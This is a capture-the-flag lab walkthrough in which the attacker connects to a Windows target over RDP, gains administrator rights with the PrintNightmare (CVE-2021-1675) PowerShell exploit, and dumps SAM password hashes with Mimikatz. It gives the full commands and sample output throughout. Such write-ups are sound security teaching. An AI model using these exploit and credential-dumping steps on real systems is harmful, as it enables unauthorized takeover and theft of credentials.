Month: October 2021
Protected: htb-horizontall-private
CVE-2021-1675
CVE-2021-1675
.
The access that we have just now is mildly revolting though. ThinVNC does not provide the nicest interface to use, and we struggle to use a lot of the functionality of the machine through it.
Cast your mind back to our initial enumeration. Remember we found that Microsoft Remote Desktop Services were running on port 3389? Assuming we have the proper credentials, we can connect to this from Linux using a tool called xfreerdp
.
The syntax for using xfreerdp
looks like this:
xfreerdp /v:10.10.226.250 /u:USERNAME /p:PASSWORD /cert:ignore +clipboard /dynamic-resolution /drive:share,/tmp
There’s a bunch of stuff going on here, so let’s break each switch down:
/v:10.10.226.250
— this is where we specify what we want to connect to./u:USERNAME /p:PASSWORD
— here we would substitute in a valid username/password combination./cert:ignore
— RDP connections are encrypted. If our attacking machine doesn’t recognise the certificate presented by the machine we are connecting to it will warn us and ask if we wish to proceed; this switch simply ignores that warning automatically.+clipboard
— this shares our clipboard with the target, allowing us to copy and paste between our attacking machine and the target machine./dynamic-resolution
lets us resize the GUI window, adjusting the resolution of our remote session automatically./drive:share,/tmp
— our final switch, this shares our own/tmp
directory with the target. This is an extremely useful trick as it allows us to execute scripts and programs from our own machine without actually transferring them to the target (we will see this in action later!)
Most people take the easy option when it comes to passwords, which makes password reuse incredibly common.
With that in mind, use xfreerdp
to connect to the target over RDP.
At this point we would usually start to enumerate the target to look for privilege escalation opportunities (or potentially lateral movement opportunities in an Active Directory environment). WinPEAS and Seatbelt are prime examples of tools that we may wish to employ here; however, there are many other tools available, and manual enumeration is always a wise idea.
That said, Windows enumeration can be daunting; there are hundreds of different vectors to consider. To keep this room simple, we will instead look at a set of exploits in the PrintSpooler service which are unpatched at the time of writing. PrintSpooler is notorious for privilege escalation vulnerabilities. It runs with the maximum available permissions (under the NT AUTHORITY\SYSTEM
account) and is a popular target for vulnerability research. There have been many vulnerabilities found in this service in the past; however, one of the latest is referred to as “PrintNightmare”.
We will use PrintNightmare to elevate our privileges on this target.
Navigate to the /tmp
directory of your attacking VM, then clone the repository.
Remember that /drive:/tmp,share
argument in the xfreerdp
command? It’s about to come in useful.
Inside your RDP session, open a new PowerShell Window.
The repository that we downloaded contains a PowerShell (.ps1
) script that needs to be imported.
We can import it using:
. \\tsclient\share\CVE-2021-1675\CVE-2021-1675.ps1
Make sure to include the dot at the start!
This uses dot-syntax to import any functions exposed by the script. We are using \\tsclient\share
to reference the share that we created. This allows us to view (and thus import) files that are stored in the /tmp folder of our own attacking machine!
Only one thing left to do: run the exploit!
We can start the ball rolling by executing Invoke-Nightmare
.
PS C:\Users\A****> Invoke-Nightmare
[+] using default new user: adm1n
[+] using default new password: P@ssw0rd
[+] created payload at C:\Users\A****\AppData\Local\Temp\1\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_18b0d38ddfaee729\Amd64\mxdwdrv.dll"
[+] added user as local administrator
[+] deleting payload from C:\Users\A****\AppData\Local\Temp\1\nightmare.dll
Notice that our payload mentions creating a new user called adm1n
with a password of P@ssw0rd
? This is the default behaviour when using this exploit; however, we could have created our own payload and substituted that in should we have preferred another method of exploitation.
Regardless, we can now make use of our brand new admin account!
The command is as follows:
Start-Process powershell 'Start-Process cmd -Verb RunAs' -Credential adm1n
Execute this in your PowerShell session and follow the steps to spawn a new PowerShell process as an Administrator!
whoami /groups
in the new window. You should see BUILTIN\Administrators
in the list of groups, and a line at the bottom of the output containing Mandatory Label\High Mandatory Level
.
These mean that you are running as an administrator with full access over the machine. Congratulations!
The classic thing to do here would be to try to dump the password hashes from the machine. In a network scenario these could come in handy for lateral movement. They also give us a way to prove our access to a client as Windows (Serious Sam vulnerability aside) prevents anyone from accessing this information if they don’t have the highest possible privileges.
The most commonly used tool to dump password hashes on Windows is Mimikatz by the legendary Benjamin Delpy. The go-to tool for Windows post-exploitation: few tools are more iconic or more well-known than Mimikatz.
First up, let’s get an up-to-date copy of Mimikatz to our attacking machine. The code for the tool is publicly available on Github, but fortunately for the sake of simplicity, there are also pre-compiled versions available for download.
Go to the releases page for Mimikatz and find the latest release at the top of the list. Download the file called mimikatz_trunk.zip
to your attacking machine.
Note: Certain browsers block the repository as being malicious. You’re a hacker — of course it’s malicious. Just continue to the page anyway: it’s perfectly safe.
/tmp
directory, then unzip it with unzip mimikatz_trunk.zip
:pentester@attacker:/tmp$ unzip mimikatz_trunk.zip
Archive: mimikatz_trunk.zip
inflating: kiwi_passwords.yar
inflating: mimicom.idl
inflating: README.md
creating: Win32/
inflating: Win32/mimidrv.sys
inflating: Win32/mimikatz.exe
inflating: Win32/mimilib.dll
inflating: Win32/mimilove.exe
inflating: Win32/mimispool.dll
creating: x64/
inflating: x64/mimidrv.sys
inflating: x64/mimikatz.exe
inflating: x64/mimilib.dll
inflating: x64/mimispool.dll
Switch back into your RDP session and (using the elevated Command Shell we obtained in the last task) execute the following command to start Mimikatz:
\\tsclient\share\x64\mimikatz.exe
If this is successful then you should get some pretty ASCII art and a new terminal prompt:
PS C:\Windows\system32> \\tsclient\share\x64\mimikatz.exe .#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz #
When we start Mimikatz we usually have to execute two commands before we start dumping hashes:
-
privilege::debug
— this obtains debug privileges which (without going into too much depth in the Windows privilege structure) allows us to access other processes for “debugging” purposes. token::elevate
— simply put, this takes us from our administrative shell with high privileges into aSYSTEM
level shell with maximum privileges. This is something that we have a right to do as an administrator, but that is not usually possible using normal Windows operations.
With these commands executed, we are ready to dump some passwords hashes!
There are a variety of commands we could use here, all of which do slightly different things. The command that we will use is: lsadump::sam
.
When executed, this will provide us with a list of password hashes for every account on the machine (with some extra information thrown in as well). The Administrator account password hash should be fairly near the top of the list:
.#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz # privilege::debug Privilege '20' OK mimikatz # token::elevate Token Id : 0 User name : SID name : NT AUTHORITY\SYSTEM --- mimikatz # lsadump::sam Domain : GAIA SysKey : 36c8d26ec0df8b23ce63bcefa6e2d821 Local SID : S-1-5-21-1966530601-3185510712-10604624 SAMKey : 6e708461100b4988991ce3b4d8b1784e RID : 000001f4 (500) User : Administrator Hash NTLM: [REDACTED]
.